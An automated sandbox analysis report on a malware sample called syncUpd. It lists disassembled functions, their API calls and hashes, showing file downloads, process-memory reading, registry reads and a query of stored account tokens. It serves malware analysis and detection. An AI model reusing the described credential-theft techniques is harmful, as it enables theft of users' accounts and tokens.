                                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 00908AD6
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 00908AE6
                                                                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00908B03
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00908B16
                                                                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(05B), ref: 00908B2E
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                              • String ID: 05B$05B
                                                                                                                                                                                                                                                              • API String ID: 3470314060-1918097640
                                                                                                                                                                                                                                                              • Opcode ID: 30fd09fcb36eb232e569ea581c467d664f2ee35282cbedbbd802be78d6068a8c
                                                                                                                                                                                                                                                              • Instruction ID: 53a9af753345f04eb2267cc9eb9f75cca839fc21453cb0d5d006690bb9b7c711
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30fd09fcb36eb232e569ea581c467d664f2ee35282cbedbbd802be78d6068a8c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C601C471F05721AFCB20AFA4980575FBB68BF45721F404026E850A76D1CB786981CBD9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00905977 Relevance: 13.7, APIs: 9, Instructions: 184COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: e40bc669b62f72619cb0d277483ebd7ad11248d88b4231bb2187a335cb0e4ec6
                                                                                                                                                                                                                                                              • Instruction ID: e8adb4a0f236e88945aaf8a804f33f3cb6ab07c77feb429266f95f561d430f4a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e40bc669b62f72619cb0d277483ebd7ad11248d88b4231bb2187a335cb0e4ec6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7571D975910608AFDB14EBE4DC95FEEB7B9BF48710F108508F515AB290DB74A905CF60
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00405D40 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0095DC90), ref: 00405DE7
                                                                                                                                                                                                                                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00405EE9
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00410E73), ref: 00405EF3
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405F00
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2507841554-0
                                                                                                                                                                                                                                                              • Opcode ID: 34e54dfce054e2becdd59dd6d2b92215cf6c13f304449908f5a6196cbd7e47e4
                                                                                                                                                                                                                                                              • Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34e54dfce054e2becdd59dd6d2b92215cf6c13f304449908f5a6196cbd7e47e4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F5FA7 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00907007: lstrcpy.KERNEL32(?,00000000), ref: 0090704D
                                                                                                                                                                                                                                                                • Part of subcall function 008F46D7: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008F475D
                                                                                                                                                                                                                                                                • Part of subcall function 008F46D7: InternetCrackUrlA.WININET(00000000,00000000), ref: 008F476D
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 008F6016
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00624C68), ref: 008F604E
                                                                                                                                                                                                                                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 008F6096
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008F60BA
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 008F60E3
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 008F6111
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000400), ref: 008F6150
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 008F615A
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 008F6167
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2507841554-0
                                                                                                                                                                                                                                                              • Opcode ID: 70d34ce9bea8a1359cdd25077828563097f5ce62b16191c8419b5346d4ddca54
                                                                                                                                                                                                                                                              • Instruction ID: a5b22286d7c36eaff18648a38b41018ce4a46512a8e504e7ed079d61907a9664
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70d34ce9bea8a1359cdd25077828563097f5ce62b16191c8419b5346d4ddca54
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD515EB1A0060CAFDB20DFA0CC55BEE7779FB84705F108198B605A71C1EB74AA85CFA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00413D90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00413D9E
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00413E2A
                                                                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT ref: 00413F7E
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: OpenProcesslstrcpymemset
                                                                                                                                                                                                                                                              • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                                                                                                                                                                                              • API String ID: 224852652-4138519520
                                                                                                                                                                                                                                                              • Opcode ID: b08ea4ffa31be0d2536895460b72ff039e75714f0de8a8ac3982c85147dd2ae2
                                                                                                                                                                                                                                                              • Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b08ea4ffa31be0d2536895460b72ff039e75714f0de8a8ac3982c85147dd2ae2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00904BC7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,00624B54,00000000,?,0041D774,00000000,?,00000000,00000000,?,0062496C), ref: 00904BD4
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00904BDB
                                                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00904BFC
                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00904C16
                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00904C24
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00904C50
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                                              • API String ID: 2774356765-2766056989
                                                                                                                                                                                                                                                              • Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                                                                                                                              • Instruction ID: 9e51d93ee13384aaf73bb865d154c7755741d49254ac64c098e6678f549483c5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1711F7B0D40308AFEB10DBE4CC4AFAEB7B9BB44704F104548F615AB2C4D7B4A9018FA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00418843 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0041884F
                                                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
                                                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C
                                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 0041886F
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 0041887F
                                                                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0041889C
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004188AF
                                                                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00423530), ref: 004188C7
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                              • String ID: 05B
                                                                                                                                                                                                                                                              • API String ID: 3470314060-3788103304
                                                                                                                                                                                                                                                              • Opcode ID: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
                                                                                                                                                                                                                                                              • Instruction ID: f16d68fd9582ac4125616c5e50f94de62243aa4c7be40d45a23fde697d24a6fa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4501AD32A05621ABD720BF6A98057CA7770AF04725F90402FF810A3390CB7CA9C2CBDD
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00413430 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExitProcess$DefaultLangUser
                                                                                                                                                                                                                                                              • String ID: *
                                                                                                                                                                                                                                                              • API String ID: 1494266314-163128923
                                                                                                                                                                                                                                                              • Opcode ID: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
                                                                                                                                                                                                                                                              • Instruction ID: 75b540bad49881e9417c8f8c63d74940121d586cf5f959f7794e893d96f52075
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BF05830508608EFE364EFE0EF0976CBBB1EB8E703F001195E60A86290CA744A119B65
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040B250 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B44D
                                                                                                                                                                                                                                                                • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B553
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B567
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                                                                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                                                              • API String ID: 2910778473-1079375795
                                                                                                                                                                                                                                                              • Opcode ID: af422a9da08c41a3a654c15dbba6af3b9b5669e0e483704c36dc237bcbe3dd48
                                                                                                                                                                                                                                                              • Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af422a9da08c41a3a654c15dbba6af3b9b5669e0e483704c36dc237bcbe3dd48
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F7207 Relevance: 12.1, APIs: 8, Instructions: 91stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 008F6F07: memset.MSVCRT ref: 008F6F4B
                                                                                                                                                                                                                                                                • Part of subcall function 008F6F07: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008F6F71
                                                                                                                                                                                                                                                                • Part of subcall function 008F6F07: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008F6FE8
                                                                                                                                                                                                                                                                • Part of subcall function 008F6F07: StrStrA.SHLWAPI(00000000,0041DD64,00000000), ref: 008F7044
                                                                                                                                                                                                                                                                • Part of subcall function 008F6F07: GetProcessHeap.KERNEL32(00000000,?), ref: 008F7089
                                                                                                                                                                                                                                                                • Part of subcall function 008F6F07: HeapFree.KERNEL32(00000000), ref: 008F7090
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00624E34,0041DEB8), ref: 008F723D
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00624E34,00000000), ref: 008F727F
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00624E34,0041DEBC), ref: 008F7291
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00624E34,00000000), ref: 008F72C6
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00624E34,0041DEC0), ref: 008F72D7
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00624E34,00000000), ref: 008F730A
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00624E34,0041DEC4), ref: 008F7324
                                                                                                                                                                                                                                                              • task.LIBCPMTD ref: 008F7332
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3191641157-0
                                                                                                                                                                                                                                                              • Opcode ID: 9397bf8d36376b94ab8d5b1f9d61ba5fef7cd9a4105ae52593d090ef9b88bb39
                                                                                                                                                                                                                                                              • Instruction ID: c88a4264b3e8c07329cd52604006222034b3075fa4266bee7b3665f979fab47f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9397bf8d36376b94ab8d5b1f9d61ba5fef7cd9a4105ae52593d090ef9b88bb39
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71315E71905509AFDB14EBB4DD99EFE7776FF48301F105118F602AB2A0DA34AD02CBA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00413BC0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • strlen.MSVCRT ref: 00413BDF
                                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00413C0D
                                                                                                                                                                                                                                                                • Part of subcall function 00413890: strlen.MSVCRT ref: 004138A1
                                                                                                                                                                                                                                                                • Part of subcall function 00413890: strlen.MSVCRT ref: 004138C5
                                                                                                                                                                                                                                                              • VirtualQueryEx.KERNEL32(00413FCD,00000000,?,0000001C), ref: 00413C52
                                                                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT ref: 00413D73
                                                                                                                                                                                                                                                                • Part of subcall function 00413AA0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00413AB8
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: strlen$MemoryProcessQueryReadVirtual
